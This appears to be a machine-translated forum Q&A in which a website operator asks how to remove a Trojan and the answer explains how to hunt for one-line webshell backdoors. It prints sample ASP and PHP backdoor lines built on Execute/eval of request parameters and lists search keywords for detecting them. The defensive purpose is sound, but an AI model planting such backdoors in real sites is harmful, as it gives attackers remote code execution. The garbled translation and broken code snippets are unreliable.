How to completely clear Trojans after a website is infected with Trojans

First, let me introduce myself. I am a movie website operator.
A friend told me when I got online yesterday. Your website is full of pictures of Baidu LOGO. Send a remote message to me. All of them are images of Baidu LOGO. Full Screen. I realized it was a Trojan. As a result, replace it with the backup file. As a result, the replacement file is also infected with Trojans. I analyze my source code. Finally, find a pony diy. asp in ADMIN. But in any case, I can no longer find it.
I hope you will be able to enlighten me
How can I completely clear trojans from my website?
Questioner: beibeibei-the best answer for beginners
Teach you a webshell for checking asp and php.
Generally, after attackers obtain the webshell of a website, they usually insert a trojan in the webpage to facilitate future access. The trojan in one sentence is concealed, among so many files, we do not know which file to insert. It is impossible to find and search files one by one. so I will teach you how to find it.
One-sentence backdoor of asp:
"<% Execute request (" l ") %> 〉"
PHP webshell:
First:
EOT;
Eval ($ );
Print <EOT
Second minute:
2.
A'] = 'aa'; eval ($ _ POST ['A ']); //
Third:
3.
A'; eval ($ _ POST ['A ']); //
The checking method is the same as the method used to detect asp or php Trojans. First, search for the modified or created files on the specified date, and then search for the following keywords in one file:
Asp one-sentence Trojan: Search Keyword: <% execute
PHP one-sentence Trojan: Search Keyword: eval
In general, the above method quickly finds out the page on which a backdoor is searched by a sentence, and finds out that K is enough.